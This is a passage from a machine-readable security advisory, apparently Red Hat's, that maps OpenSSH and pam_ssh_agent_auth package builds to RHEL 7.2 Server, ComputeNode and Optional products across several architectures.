"pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Server-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat 